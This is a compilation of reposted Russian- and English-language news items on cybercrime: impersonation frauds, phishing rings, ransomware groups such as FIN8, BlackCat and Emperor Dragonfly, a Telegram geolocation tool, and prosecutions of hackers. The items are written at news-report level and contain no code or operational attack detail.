Заключенный в американском штате Джорджия придумал хитроумную мошенническую схему и украл 11 миллионов долларов, не выходя из тюремной камеры. Об одном из крупнейших ограблений в истории США, совершенных из-за решетки.
31-летний заключенный Артур Ли Кофилд-младший получил в свое время 14 лет колонии за вооруженное ограбление. В 2020 году преступник заскучал в четырех стенах и решил обзавестись элитной недвижимостью. Для осуществления идеи-фикс Артуру нужно было срочно пополнить счет несколькими миллионами долларов. Тогда заключенный чудесным образом раздобыл контрабандный телефон, который довольно долго умудрялся прятать в своей камере, пока тюремщики не нашли "запрещенку".
Артур дозвонился в службу поддержки клиентов финансовой компании и представился голливудским продюсером Сидни Киммелом. Подставной миллиардер умудрился облапошить сотрудников и доказать "свою" личность - 11 миллионов быстренько перекочевали со счета господина Киммела в Айдахо, где заключенный купил 6106 инвестиционных монет "Американский золотой орел". Затем Артур арендовал частный самолет, чтобы доставить "мешки" с золотом в Атланту бизнес- классом и прикупить там домик за без малого 4,4 миллиона долларов. Сообщники помогли внести ему залог в размере 720 тысяч долларов наличными, а затем и оставшуюся сумму. Попутно Артур натравил членов банды на своего соперника и приказал пристрелить перешедшего ему дорогу неизвестного.
К несчастью для героя, многомиллионную схему раскрыли, и федералы предъявили ему обвинение в участии в сговоре с целью совершения банковского мошенничества и отмывания денег, а также в покушении на убийство. Под следствие попали и сообщники заключённого. Примечательно, что разбирательства по делу идут уже на протяжении нескольких лет - правоохранители старательно изучают документы и судебные протоколы. Так что дальнейшая судьба Артура и его многомиллионного дома, пока остается загадкой.
source: nytimes.com/2022/10/16/us/georgia-inmate-scam- billionaire.html?searchResultPosition=1
Теперь Windows сможет защитить пользователя от вредоносных архивов, скачанных из Интернета
Архиватор 7-Zip добавил поддержку функции безопасности Windows «Mark-of-the-
Web», которая защищает от загруженных вредоносных файлов.
Когда вы загружаете документ и исполняемый файл из Интернета, Windows
добавляет в файл специальный альтернативный поток данных «Zone.Id» под
названием Mark-of-the-Web (MoTW). Идентификатор сообщает Windows, что файл был
загружен с другого компьютера или из Интернета и может представлять опасность
после открытия.
Когда вы пытаетесь открыть загруженный файл, Windows проверит наличие MoTW и
попросит пользователя подтвердить запуск файла.

Microsoft Office также проверит наличие Mark-of-the-Web и откроет документ в
режиме защищенного просмотра только для чтения и с отключенными макросами.
[](https://www.securitylab.ru/upload/images/content-
img(119).png)
Чтобы включить MoTW, найдите и откройте «Диспетчер файлов 7-Zip», затем
нажмите «Инструменты», далее «Параметры». На вкладке 7-Zip можно увидеть новую
опцию под названием «Распространить поток Zone.Id» и возможность установить
для значения «Нет», «Да» или «Только для файлов Office». Чтобы воспользоваться
новой функцией, нужно загрузить версию 7-zip 22.0 с сайта 7-zip.org .

На протяжении многих лет исследователи безопасности, разработчики и инженеры
просили разработчика 7-Zip Игоря Павлова добавить функцию безопасности в
утилиту архивации. И вот на прошлой неделе в 7-Zip 22.00, которая
распространяет MoTW из загруженного архива на все извлеченные файлы.
Ранее Microsoft добавила в Windows 11 новую функцию под названием «Аудит
конфиденциальности» , которая показывает историю доступа каждого приложения к
микрофону, геолокации и другим данным.
Наиболее активными смействами вымогателей оказались GandCrab, Babuk и Cerber.
По меньшей мере 130 различных семейств вымогательского ПО проявляли активность на протяжении 2020 года и первой половины 2021 года, говорится в отчете VirusTotal, основанном на анализе более 80 млн образцов вымогательских программ, загруженных в сервис в указанный период.
При этом чаще всего образцы загружались из Израиля, Южной Кореи, Вьетнама, Китая, Сингапура, Индии, Казахстана, Филиппин, Ирана и Великобритании. Как пояснил инженер по безопасности VirusTotal Винсенте Диаз (Vicente Diaz), высокое число загрузок вовсе не значит, что вышеуказанные страны являются наиболее атакуемыми. Например, высокие показатели Израиля (число загрузок образцов вымогателей из этой страны выросло на 600%) могут быть связаны с тем, что «многие компании [в стране] автоматизируют загрузки» на сервис.
Топ наиболее активных семейств вымогателей возглавил GandCrab (78,5% образцов), в основном за счет высокой активности в период с января по июль 2020 года (во второй половине года активность группировки значительно снизилась). На втором месте оказался вымогатель Babuk (7,61%), за которым следуют Cerber (3,11%), Matsnu (2,63%), Wannacry (2,41%), Congur (1,52%), Locky (1,29%), Teslacrypt (1,12%), Rkor (1,11%) и Reveton (0,70%).
«В числе топ 10 семейств вымогателей мы видим наличие wannacry. Возможно, это остатки старых детектирований, которые все еще актуальны для некоторых текущих семейств вымогателей. Тем не менее, мы не считаем, что это свидетельствует о новой волне атак wannacry», - отмечается в отчете.
Что касается наиболее атакуемых систем, первенство в данной категории принадлежит ОС Windows – 95% обнаруженных образцов являлись исполняемыми файлами для Windows или DLL-библиотеками. При этом доля вредоносов для Android составила всего 2,09%. Кроме того, в середине 2020 года был обнаружен вредонос EvilQuest, атакующий Apple Mac.
Как отмечается, примерно 5% проанализированных образцов были связаны с эксплоитами, в основном для уязвимостей повышения привилегий или удаленного выполнения кода в Windows.
Практически все десять наиболее активных семейств вымогателей задействовали различные вредоносные программы, такие как Emotet, Zbot, Dridex, Gozi или Danabot, а также инструменты для передвижения по сети (Mimikatz и Cobaltstrike) и десятки троянов для удаленного доступа (Phorpiex, Smokeloader, Nanocore, Ponystealer и пр.).
VirusTotal – принадлежащий Google бесплатный сервис, предоставляющий сведения о репутации и контексте угроз, помогающий анализировать подозрительные файлы, URL, домены и IP-адреса для выявления киберугроз.
source: storage.googleapis.com/vtpublic/vt-ransomware-report-2021.pdf
Кобринским районным отделом Следственного комитета устанавливаются обстоятельства хищения денег граждан Беларуси с банковских счетов.
По данным следствия, киберпреступники разместили в Интернете фишинговые ссылки на сайты, имитирующие официальные страницы белорусских банков. На них пользователям предлагалось за денежное вознаграждение заполнить анкету, а для получения прибыли ввести реквизиты банковских карт. Доверчивые граждане заполняли предложенную форму и тем самым передавали злоумышленникам все сведения о счетах. После этого мошенники привязывали карты к платежным сервисам и похищали деньги.
Установлено, что 2 июня текущего года для обналичивания денег из России в Беларусь прибыл 20-летний мужчина. При подходе к банкомату он предпринимал меры для конспирации, спрятав лицо за очками и капюшоном. Молодой человек снял с банковского терминала более 5000 рублей, но покинуть страну не успел. В результате проведения оперативно-розыскных мероприятий его задержали сотрудники милиции.
Кобринским районным отделом Следственного комитета к мужчине с санкции прокурора применена мера пресечения в виде заключения под стражу. Подозреваемый сотрудничает со следствием и дает признательные показания.
Расследование уголовного дела продолжается, проводятся следственные и процессуальные действия, направленные на установление всех участников преступной цепочки, а также граждан, пострадавших от киберпреступников.
• Source: sk.gov.by/ru/news-usk-brest-ru/view/kibermoshennik-pribyl-v-belarus- dlja-obnalichivanija-poxischennyx-deneg-on-pod-strazhej-13836/
Исследователь создал инструмент Close-Circuit Telegram Vision (CCTV), позволяющий искать пользователей Telegram, у которых включена настройка «Люди рядом». CCTV показывает примерное физическое местоположение пользователей на карте, даже если они находятся совсем не рядом.
[](https://xakep.ru/wp- content/uploads/2024/05/460626/CCTV1.png)
На [проект CCTV](https://github.com/IvanGlinkin/CCTV?tab=readme-ov- file&ref=404media.co) обратили внимание журналисты издания [404 Media](https://www.404media.co/this-tool-shows-some-telegram-users- approximate-physical-location/). Инструмент ищет людей с помощью настройки «Люди рядом», которая отключена по умолчанию. Исходно эта функция предназначена для поиска других пользователей Telegram, находящихся поблизости. Однако CCTV позволяет любому желающему искать людей по всему миру (если у них, конечно, включена упомянутая функция).
На GitHub-странице проекта сказано, что «пользователи могут следить за другими людьми в режиме реального времени для обеспечения логистики или безопасности, переосмысливая то, как мы ориентируемся в окружающей обстановке».
Как отмечают журналисты, пользователи мессенджера могли согласиться с тем, что их данные будут доступны в одном контексте, однако теперь они предстают совсем в другом.
«У них [Telegram] есть защитный механизм, но его недостаточно для защиты», — рассказал изданию Иван Глинкин.
Click to expand...
Разработчик объяснил, что CCTV использует API Telegram, связанный с функцией Find People Nearby. «В качестве входных данных он принимает кастомные широту и долготу, поэтому можно вводить любые данные (не нужен даже GPS-спуфинг)», — сообщил Глинкин. Также он показал журналистам два других проекта с похожей функциональностью, но отметил, что его проект более точен.
Представители 404 Media лично убедились в работоспособности CCTV, обнаружив с его помощью пользователей Telegram, которые на самом деле находились не рядом, а в других городах и даже на других континентах.
Пресс-служба Telegram дала изданию следующий комментарий:
«Опциональная функция “Люди рядом” была создана специально для людей, которые хотят сообщить о своем местоположении другим. По умолчанию она всегда отключена. Координаты, которые отображает инструмент с GitHub, не являются местоположением пользователя — данные на сервере аппроксимируются до 800 метров и существуют только для пользователей, которые явно предпочли транслировать свое местоположение вовне. Любое приложение Telegram может предоставить вам доступ к тем же данным».
Click to expand...
Однако приложение Telegram не позволяет искать других пользователей в мировом масштабе. Люди, у которых включена функция «Люди рядом» полагают, что их могут обнаружить только пользователи, которые физически находятся неподалеку.
В FAQ Telegram тоже сказано, что эта функция «позволяет пользователям Telegram изучать местные группы, находить друзей для общения в своем районе или быстро обмениваться контактами с людьми, которые находятся поблизости».
© https://xakep.ru/2024/05/08/close-circuit-telegram-vision/
Исследователи кибербезопасности обнаружили, что известная группа хакеров, мотивированных финансовой выгодой, использует новую версию вредоносной программы Sardonic для взлома сетей и распространения вымогательского ПО BlackCat, производства киберпреступной банды ALPHV.
Группировка FIN8, также известная как Syssphinx, активно действует с января 2016 года и специализируется на атаках на отрасли розничной торговли, ресторанного бизнеса, гостиничного сервиса, здравоохранения и развлечений.
С момента [первого обнаружения](https://www.fireeye.com/blog/threat- research/2016/05/windows-zero-day-payment-cards.html) этой группы компанией FireEye, FIN8 была связана с множеством крупномасштабных кампаний, характеризующихся своим нерегулярным характером. Тем не менее, атаки FIN8 существенно повлияли на множество организаций, оставив след из сотен жертв.
Арсенал, используемый этой группой, весьма обширен и включает в себя широкий спектр инструментов и тактик, таких как вредоносные программы для POS- терминалов (BadHatch, PoSlurp/PunchTrack и PowerSniff/PunchBuggy/ShellTea), а также эксплуатацию уязвимостей Windows и фишинговые кампании.
Позже хакеры перешли от BadHatch к бэкдору на базе C++, известному как Sardonic, который, по данным исследователей безопасности из Bitdefender, обнаруживших его ещё в 2021 году , может собирать информацию, выполнять команды и разворачивать дополнительные злонамеренные модули в виде DLL-плагинов.
Команда охотников за угрозами Symantec заметила обновлённую версию этого бэкдора в атаках, датированных декабрём 2022 года, о чём сообщила в [сегодняшнем отчёте](https://symantec-enterprise- blogs.security.com/blogs/threat-intelligence/syssphinx-fin8-backdoor) . Эта версия имеет много общих функции с версией, обнаруженной Bitdefender, однако большая часть кода бэкдора была переписана таким образом, что он приобрёл новый вид.
«Интересно, что код бэкдора больше не использует стандартную библиотеку C++, а большинство объектно-ориентированных возможностей были заменены простой реализацией на C», — сообщили исследователи Symantec.
«Кроме того, некоторые переработки выглядят неестественно, что указывает на то, что основная цель злоумышленников могла быть в том, чтобы избежать сходства с ранее раскрытыми деталями вредоноса. Причём эта цель касалась лишь самого бэкдора, поскольку известные методы группировки по-прежнему использовались в новых атаках», — добавили специалисты.
Хотя конечной целью их атак является кража данных платёжных карт с POS-систем, FIN8 расширила свою деятельность от атак на POS-терминалы до атак с использованием вымогательского ПО для максимизации прибыли. Например, по данным Symantec, впервые в июне 2021 года FIN8 была замечена в распространении вымогательского программного обеспечения Ragnar Locker на скомпрометированных системах финансовой компании в США.
Шесть месяцев спустя, в январе 2022 года, использование вымогательского софта White Rabbit также было связано с FIN8 после того, как исследователи обнаружили связь с инфраструктурой группы при анализе этапа развёртывания вредоносного ПО. Кроме того, бэкдор Sardonic также использовался во время атак с использованием вымогательского ПО White Rabbit, что дополнительно связывает их с FIN8.
В последних атаках группировки, зафиксированных в декабре прошлого года, Symantec также обнаружила, что хакеры FIN8 распространяли вымогательское ПО BlackCat, где и использовалась новая версия вредоносной программы Sardonic.
«Syssphinx продолжает развивать и улучшать свои возможности и инфраструктуру доставки вредоносного ПО, периодически усовершенствуя свои инструменты и тактики, чтобы избежать обнаружения», — рассказали специалисты Symantec.
«Решение группы расшириться от атак на POS-терминалы до распространения вымогательского ПО демонстрирует преданность злоумышленников максимизации прибыли от организаций-жертв», — подытожили исследователи.
Хакер из Вьетнама взломал криптобиржу, украв данные 29 000 пользователей, после чего стал шантажировать команду сайта, требуя заплатить более 400 млн в местной валюте.
Вьетнамский суд приговорил к десяти годам лишения свободы жителя города Хошимин, обвиненного в краже 300 млн вьетнамских донгов ($13*000) у криптовалютного предпринимателя — Нхам Хоанг Кханг (Nham Hoang Khang), по мнению следствия, несколько раз атаковал криптобиржу бизнесмена.
Биржа была создана в 2018 году с целью облегчения связи продавцов цифровых валют и покупателей, зарабатывая на комиссиях. Площадка соблюдала процедуру KYC (Знай своего клиента), требуя номер телефона пользователя и личную информацию.
В 2020 году Кханг создал несколько учетных записей на веб-сайте биржи и обнаружил ряд уязвимостей, которые давали доступ не только к личной информации пользователей, но и к их активам. Вскоре хакер завладел аккаунтом сотрудника площадки, на кошельке которого было порядка $30000. После этого аккаунт заблокировали, однако хакер смог получить данные еще 29000 пользователей и начал шантажировать команду криптобиржи, угрожая дальнейшими атаками.
Глава биржи заплатил хакеру 300 млн донгов, однако вскоре подал заявление в полицию. Лишь через полтора года правоохранителям удалось отыскать и арестовать хакера. Расследование затруднил тот факт, что криптовалюты не легализованы во Вьетнаме и почти никак не регулируются.
Правоохранители Харькова установили, что на территории их юрсидикции действует неизвестный, имеющий отношение к организации популярной схемы кибермошенничества. Речь идет о создании фишинговых веб-страничек, имитирующих сервис безопасных сделок «ОЛХ Доставка», в результате посещения которых, жертвы неосмотрительно передают мошенникам данные своих банковских карт, с которых преступники крадут деньги.
В ходе расследования, правоохранители обнаружили, что в настоящее время в кроссплатформенном мессенджере Telegram функционирует 76 активно действующих закрытых преступных telegram-сообществ, где администраторы предоставляют возможность заинтересованным лицам принять участие в данной преступной схеме, с целью завладения денежными средствами граждан с помощью фишинговых ссылок.
Установлено, что участники преступных сообществ имеют четкую иерархию и распределение ролей, направленных на создание Telegram-каналов и Telegram- ботов, с помощью которых фигуранты генерируют фишинговые ссылки.
В состав преступных сообществ входят:
Учредитель проекта (так называемый «ТС»), организатор преступной схемы, лицо, создавшее сообщество и установившее определенные правила, которые должны соблюдать все остальные члены преступной группировки. Он также отвечает за своевременные выплаты денежных средств участникам преступной схемы и контролирует их деятельность;
«КОДЕР» - лицо, обладающее техническими знаниями и навыками, отвечает за функционирование «Telegram»-бота, с помощью которого участники преступной схемы создают необходимые «фишинговые» ссылки;
«УБИВЕР» - лицо, отвечающее за использование полученных, в результате фишинга, платежных реквизитов, получения доступа к личным кабинетам онлайн- банкингов и осуществления вывода средств на подконтрольные банковские карты;
Операторы - лица, в обязанности которых входит поиск потенциальных жертв на торговой площадке «OLX», введение их в заблуждение, под предлогом осуществления платежа за покупку или продажу товара и предоставление им фишинговой ссылки, используя которую, потерпевший передает данные своей банковской карты мошенникам.
По поручению следователя, сотрудники Департаментка киберполиции НПУ в Харьковской области провели мониторинг Telegram-сообществ и Telegram-каналов, в ходе которого были установлены учетные записи ряда пользователей Telegram, являющихся участниками преступной схемы, выполняющих отведенные им роли операторов в указанной схеме.
Киберполицейским удалось установить уникальные идентификаторы 37 человек и запросить через суд их персональные данные в одном из украинских банков, с поддержкой которого в Telegram эти лица общались при помощи тех же идентификаторов.
В перечень таких данных входят анкетные данные, копии паспортов и идентификационных кодов, платежные реквизиты и выписки по счетам, IP-адреса, с которых производилась авторизация в системах интернет-банкинга, а также фотоснимки с камер наблюдения банкоматов.
В результате обработки этих данных, правоохранители смогут установить большой круг подозреваемых лиц, причастных к мошеннической схеме, чтобы вручить им обоснованное подозрение.
Группировка использует разные программы-вымогатели для отвлечения внимания, а не для получения финансовой выгоды.
Исследователи из ИБ-компании Sygnia приписали недавно обнаруженную программу- вымогатель Cheerscrypt китайской кибершпионской группировке Emperor Dragonfly, которая также известна как Bronze Starlight (Secureworks) и DEV-0401 (Microsoft).
Emperor Dragonfly развернула open source инструменты, которые были написаны китайскими разработчиками для китайских пользователей. По словам Sygnia, это подтверждает то, что операторы программы-вымогателя Emperor Dragonfly базируются в Китае.
Помимо Cheerscrypt за 1 год группировка использовала семейства программ- вымогателей LockFile , AtomSilo , Rook , Night Sky , Pandora и LockBit 2.0 . Secureworks отметила , что Bronze Starlight использует программы-вымогатели для отвлечения внимания, а не для получения финансовой выгоды, а основной целью атак является кража интеллектуальной собственности или шпионаж.
Также исследователи предположили, что это проукраинская группировка , поскольку она размещает украинские политические лозунги на своем сайте утечки в даркнете.
Стоит отметить, что основу семейств Rook, Night Sky и Pandora составляет программа Babuk . Цепочки заражения, наблюдаемые на сегодняшний день, используют уязвимость Log4Shell для компрометации серверов VMware Horizon и запуска вредоносных PowerShell скриптов , чтобы доставлять зашифрованный маяк Cobalt Strike.

Цепочка атак Emperor Dragonfly
Эксперты Sygnia также обнаружили 3 дополнительных инструмента на основе Go, развернутых в тандеме с маяком:
кейлоггер, который экспортирует записанные нажатия клавиш в Alibaba Cloud;
утилиту интернет-прокси iox;
ПО для туннелирования NPS.
Связи Cheerscrypt с Emperor Dragonfly основаны на сходстве начальных векторов доступа, методов бокового перемещения и развертывания зашифрованного маяка Cobalt Strike с помощью техники боковой загрузки DLL (DLL Sideloading).
source:
blog.sygnia.co/revealing-emperor-dragonfly-a-chinese-ransomware-
group#:~ext=INTRODUCTION,Ukrainian%20national%20salute
blog.sygnia.co/revealing-emperor-dragonfly-a-chinese-ransomware-
group#:~ext=Sygnia%20decided%20to,web%20leak%20site
Since December, FTA-linked hacks have been reported by the Reserve Bank of New Zealand, Australian Securities and Investments Commission (ASIC), law firm Allens, the University of Colorado, and more.
Сегодня утром в полицию обратился обеспокоенный представитель частного регионального банка. Он поведал стражам галактики удивительную историю о исчезновении более 28,2 миллиона рублей, принадлежащих финансовой организации. Терпилу внимательно выслушали, после чего отправили к 35-летнему похитителю бабулесов группу очень жестких вротебателей.
Жандармы застали скамерсанта в расплох, поэтому он сразу же во всем сознался — он совершал возврат денег на банковские карты по операциям, оплата по которым на самом деле не проводилась. Для этого предприимчивый гражданин использовал свой платежный терминал. Таким образом, будучи у себя дома, он «вернул» 28,2 миллиона рублей.
При обыске правоохранители изъяли 9 аппаратов для приема безналичных платежей, документы и два айфона. Возбуждено уголовное дело о краже в особо крупном размере. Задержанный помещен в изолятор временного содержания. Правоохранители устанавливают дополнительные эпизоды.
The threat actor known as Roaming Mantis has implemented a DNS changer to infiltrate WiFi routers and undertake DNS hijacking.
Back in 2018, Kaspersky first saw this actor's activities targeting Asian countries, including Japan, South Korea and Taiwan. At that time, the criminals compromised Wi-Fi routers for use in DNS hijacking.
Roaming Mantis is a long-term cyberattack campaign that uses malicious Android package (APK) files to control infected Android devices and steal data. It was found to be active throughout 2022 and, in the last few months, it has upgraded its tools and tactics.
Sources:
https://community.riskiq.com/article/b0acb462/description
<https://securelist.com/roaming-mantis-dns-changer-in-malicious-mobile-
app/108464/>
https://www.infosecurity-magazine.com/news/roaming-mantis-adds-dns-changer/
<https://cyware.com/news/roaming-mantis-new-dns-changer-function-to-target-
public-routers-33667a99>
Из-за конфликта среди членов преступной группировки двое злоумышленников похитили своего сообщника, чтобы завладеть его долей незаконно заработанных денег. История началась с заявления в киберполицию на Украине. Отдел занимается обнаружением злоумышленников, действующих в интернете, в частности, речь идет об онлайн-мошенниках и других киберпреступниках.
Конфликты развивается в организации сами по себе
Украинские правоохранительные органы арестовали подозреваемых в киберпреступлениях, обвиняемых в хищении средств у некоторых ведущих промышленных предприятий страны. Об этом сообщает в конце июля 2024 г. официальный сайт орган государственного управления.
Согласно сообщению киберполиции Украины, подозреваемые заразили компьютеры сотрудников вредоносным программным обеспечением (ПО), чтобы получить удаленный доступ к их финансовым ИТ-системам, и изменили их банковские реквизиты на счета, контролируемые хакерами. Предположительно, подозреваемым удалось похитить почти около $145 тыс. В сообщении не говорится, какие именно предприятия подверглись атаке.
По словам полицейских, двое членов преступной группировки не смогли договориться о том, как распределить украденные средства, и похитили третьего сообщника, чтобы заставить его передать свою долю заработка.
Полиция Украины обнаружила автомобиль, на котором передвигались подозреваемые, и задержала их в пути. Среди улик, найденных в машине, были кошельки подозреваемых, мобильные телефоны и одеяло, покрытое красными пятнами, похожими на кровь.
Если их признают виновными, предполагаемым хакерам грозит до 12 лет тюрьмы по обвинению в похищении и вымогательстве. В настоящее время расследование продолжается, и подозреваемым могут быть предъявлены дополнительные обвинения.
Активизация мошенников
С начала старта специальной военной операции (СВО) России на Украине активизировались мошенники, пытающиеся выманить деньги через интернет.
Киберполиция Украины занимается обнаружением злоумышленников, действующих в интернете. В частности, речь идет об онлайн-мошенниках и других киберпреступниках. Аферисты придумывают схемы с колл-центрами, фейковыми магазинами, якобы эвакуации из опасных регионов и даже псевдоволонтерством.
Аферы - это обманные и мошеннические действия, которые совершают люди, пытаясь обмануть других с целью получения финансовой или личной выгоды, и мошенники не собираются прекращать свое гнусное поведение в ближайшее время. Недавнее исследование Citibank показало, что, несмотря на то, что 90% респондентов считают, что могут легко распознать и избежать мошенничества, более четверти все же стали его жертвами.
Многие люди попадаются на удочку мошенников из-за недостаточной осведомленности о распространенных тактиках мошенничества, а также из-за способности мошенников использовать эмоциональную и психологическую уязвимость своих жертв. Вот несколько видов виртуального мошенничества, которые могут часто появляться в 2024 г.: мошенничество с пиринговыми платежами (P2P); мошенничества с использованием искусственного интеллекта (ИИ); мошенничества с захватом счетов правительства; мошенничество с QR-кодами; мошенничество с объявлениями о вакансиях.
В случае с мошенничеством скептицизм всегда полезен и может помочь в построении более безопасного цифрового будущего.
Ситуация с телефонным мошенничеством
Ведомства в России приводят разные цифры: если в Центробанке России сообщают о 16 млрд руб., которые украли мошенники в 2023 г., то Министерство внутренних дел (МВД) России называет цифру в 10 раз больше - 157 млрд руб.. По оценкам «Сбера», в 2023 г. мошенники украли у россиян более 250 млрд руб.. При этом с начала 2024 г. банк помог своим клиентам спасти более 150 млрд руб.
Центрами телефонного мошенничества остаются колл-центры на территории Украины. И прежде всего в городе Днепр. По данным «Сбера», количество этих колл-центров уменьшилось примерно в 2,5 раза и сейчас на Украине против россиян работает порядка 350 - 400 мошеннических колл-центров, ранее их было около 1 тыс. При этом уровень их технической оснащенности, эффективность используемых сценариев работы с людьми, масштабы проникновения и вывода денег значительно увеличились. В мошеннических колл-центрах на Украине работает несколько сотен тысяч человек и каждый из них может зарабатывать порядка $3 тыс. (250 тыс. руб.) в месяц.
Благодаря поправкам в закон о связи поступающий из-за рубежа трафик теперь контролируется. Сегодня проблема звонков с подменой номера из-за границы в основном решена. Но возникают другие способы организации атак. 81% всех мошеннических звонков совершается через мессенджеры и облачные автоматические телефонные станции (АТС). Для обмана мошенники массово покупают электронные SIM-карты - eSIM. Это стало новым трендом, позволяющим массово обзванивать наших граждан. В российском законодательстве предусматривает возможность покупок SIM-карт гражданами других государств без паспорта — по ID-карте, и на них покупаются сотни тысяч симок по всей стране.
По данным МВД России, ежемесячно в России продается порядка миллиона SIM-карт, которые затем используются для обмана граждан страны.
The UK Research and Innovation (UKRI) is dealing with a ransomware incident that encrypted data and impacted two of its services, one offering information to subscribers and the platform for peer review of various parts of the agency.
UKRI is a public body of the Government of the United Kingdom, tasked with
investing in science and research. It operates across the country with a
budget of more than £6 billion, funded by the Department for Business, Energy
and Industrial Strategy.
Given the funds it works with, the agency is an attractive target for big-game
ransomware gangs that target organizations with large pockets to pay for data
decryption.
An announcement from UKRI this week informs of a cyberattack that resulted in “data being encrypted by a third party.”
The disclosure is scarce in details about the attack or who was behind it as an investigation is underway. “We have reported the incident to the National Crime Agency, the National Cyber Security Centre and Information Commissioner’s Office,” UKRI informs.
The two services affected by the incident are a portal for the UK Research Office (UKRO) based in Brussels that offers an information service to subscribers and an extranet that UKRI councils use for their peer review activity. Both services have been suspended.
At this point in the investigation, there is no evidence that the attackers
stole any data from UKRI’s systems but the agency notes that the hackers have
compromised grant applications and review information from the extranet
service.
Furthermore, the UKRO subscription service has 13,000 users and the hackers
may have taken data belonging to them - non-sensitive, personal information.
Should the investigation reveal a data theft, UKRI will contact affected
individuals.
The agency cannot confirm this as a fact until the assessment of the incident completes but is considering the loss of personal, financial, or other types of sensitive data to the attackers.
Партнеры более нефункционирующих RaaS-сервисов BlackMatter и REvil организовали новую группировку BlackCat, также известную как ALPHV, которая уже активно атакует поставщиков сервисов планирования ресурсов предприятий и промышленные компании.
Согласно последнему отчету «Лаборатории Касперского», вымогатели заразили «большое количество корпоративных жертв».
Как именно распределяются роли в новой группировке, между ее партнерами и другими киберпреступными сервисами, пока неизвестно, сообщил старший исследователь безопасности ЛК Курт Баумгартнер (Kurt Baumgartner).
«Скорее всего, все атаки BlackCat осуществляются участниками обеих группировок, которые поддерживают код и сервис, а партнеры делают собственную работу. Некоторая работа также может делегироваться дальше брокерам доступа и взломщикам из других группировок», - пояснил Баумгартнер.
Как выяснили специалисты ЛК, BlackCat использует модифицированную версию закрытого инструмента под названием Fendr (модифицированная версия получила название ExMatter), которым ранее пользовалась только BlackMatter. В частности, «коты» использовали его для извлечения данных из сетей компаний перед развертыванием вымогательского ПО в декабре 2021-го и январе 2022 года.
Группировка является одной из немногих, использующих популярный, но все еще малораспространенный язык программирования Rust, позволяющий ей быстро компилировать инструменты для нескольких платформ. Благодаря Rust хакеры могут выпускать одну версию инструмента для Windows и Linux (кросс-компиляция) и выполнять тщательную проверку безопасности для уменьшения числа уязвимостей.
Специалисты ЛК зафиксировали атаки BlackCat на поставщика сервисов планирования ресурсов для предприятий га Среднем Востоке. Злоумышленники похитили учетные данные и зашифровали ее жесткие диски. Вторая жертва – нефтегазовая компания в Южной Америке.
source: securelist.com/a-bad-luck-blackcat/106254
Злоумышленники использовали хитрые схемы и помощь изнутри компании.
Федеральный суд Северного округа Калифорнии выдвинул обвинения против двух
жителей Хьюстона, штат Техас, в краже более миллиона долларов у курьеров
сервиса доставки еды DoorDash. Согласно обвинительному заключению, Олуватоби
Отукелу и Эван Эдвардс похитили заработную плату у не менее 138 курьеров из
шести штатов США за последние два года.
Схема мошенничества заключалась в использовании личных данных курьеров для
обмана службы поддержки DoorDash. Злоумышленники звонили представителям
клиентской службы, выдавая себя за курьеров, якобы потерявших доступ к своим
аккаунтам. Они требовали изменить данные для входа, а затем перенаправляли
средства на подконтрольные им банковские счета.
Для подтверждения личности курьеров мошенники использовали различные персональные данные, включая номера телефонов, даты рождения, информацию о недавних транзакциях и даже последние четыре цифры водительских удостоверений. Источники получения этой информации в обвинительном заключении не уточняются, однако упоминается о возможном участии других сообщников.
В некоторых случаях DoorDash запрашивал селфи для верификации личности. В ответ злоумышленники отправляли собственные фотографии, пытаясь обойти усиленные меры безопасности компании.
Похищенные средства использовались в личных целях. Например, в июле 2023 года один из сообщников украл $759,88 с аккаунта курьера, половина суммы пошла на оплату кредита Эдвардса за Mercedes C300 кабриолет. Также выяснилось, что злоумышленники пытались привлечь сотрудников DoorDash к участию в этой схеме.
DoorDash подтвердил факт краж и сообщил, что изначально передал дело в ФБР. Отукелу и Эдвардс были арестованы 26 сентября. В компании заявили, что отстранил сотрудников, причастных к мошеннической схеме, и выразил надежду на справедливое наказание виновных.
404media.co/men-stole-over-1-million-from-doordash-delivery-drivers-by- impersonating-them-to-customer-service/
Американский хакер обвиняется в организации криминального кибермаркета Real Deal. Ранее он уже отсидел в Великобритании за DDoS-атаку, которая вывела из строя половину сетей в Либерии.
И вновь добро пожаловать на нары
Министерство юстиции США выдвинуло официальные обвинения против печально известного хакера Дэниела Кэйи (Daniel Kaye), назвав его основным оператором криминального маркета в даркнете, на котором продавались хакерские инструменты и реквизиты доступа к компьютерам, принадлежащим государственным ведомствам.
Речь идет о площадке Real Deal. Помимо вредоносного кода, реквизитов доступа к чужим системам и ботнетам, а также краденых личных данных, на этом рынке продавались оружие и наркотики.
Поставщики криминального товара могли открывать там собственные страницы. Как утверждается в обвинительном заключении, среди предлагаемых товаров были реквизиты доступа к компьютерам ВМФ США, Центров контроля и профилактики инфекционных заболеваний, Почтовой службы США, Национального управления по аэронавтике и исследованию космического пространства (NASA) и Национального управления океанических и атмосферных исследований.
Кроме того, в документе указывается, что Кэйи лично занимался перепродажей персональных данных, в том числе номеров полисов социального страхования (основных уникальных идентификаторов личности в США) и «как минимум 15 пар логинов и паролей к Twitter и LinkedIn».
Кроме того, Кейи занимался отмыванием заработанных таким образом криптовалют через Bitmixer.io. Ему предъявлены обвинения в пяти эпизодах мошеннического доступа к компьютерным устройствам, одному эпизоду заговора с целью отмывания денег и нескольким эпизодам компьютерных взломов.
Хакер в особо крупных масштабах
Кэйи получил особую известность в октябре 2016 г., когда организовал DDoS- атаку против различных сетей в государстве Либерия. Следствием атаки стало отключение доступа к Всемирной сети для половины страны и выход из строя сетей ряда банков, больниц и учебных заведений.
В феврале 2017 г. Кэйи арестовали при попытке вылететь из Лондона на Кипр. Власти Великобритании и ряда других стран предъявили ему обвинения в организации DDoS-атак. После этого его экстрадировали в Германию, где ему вменили в вину вывод из строя сотен роутеров, принадлежащих национальному телеком-провайдеру Deutsche Telekom. Власти Германии дали ему условный срок. Тем не менее, после этой истории он снова попал в британскую тюрьму и провёл 32 месяца — как раз за атаку на Либерию.
Ему также пытались предъявить обвинения в организации атаки на банковскую сеть LloydsandBarclay, но в итоге в начале 2020 г. отпустили на волю.
Интересно, что хакер активно воевал с экспертами по кибербезопасности, такими как Брайан Кребс (Brian Krebs), Маркус Хатчинс (Marcus Hutchins) и Кевин Бомон (Kevin Beaumont). Все они отслеживали деятельность хакера в течение длительного времени и публиковали информацию о ней. Например, Кребс утверждал, что именно Кэйи продавал вредоносную программу GovRAT, предназначенную для получения доступа к госорганам США.
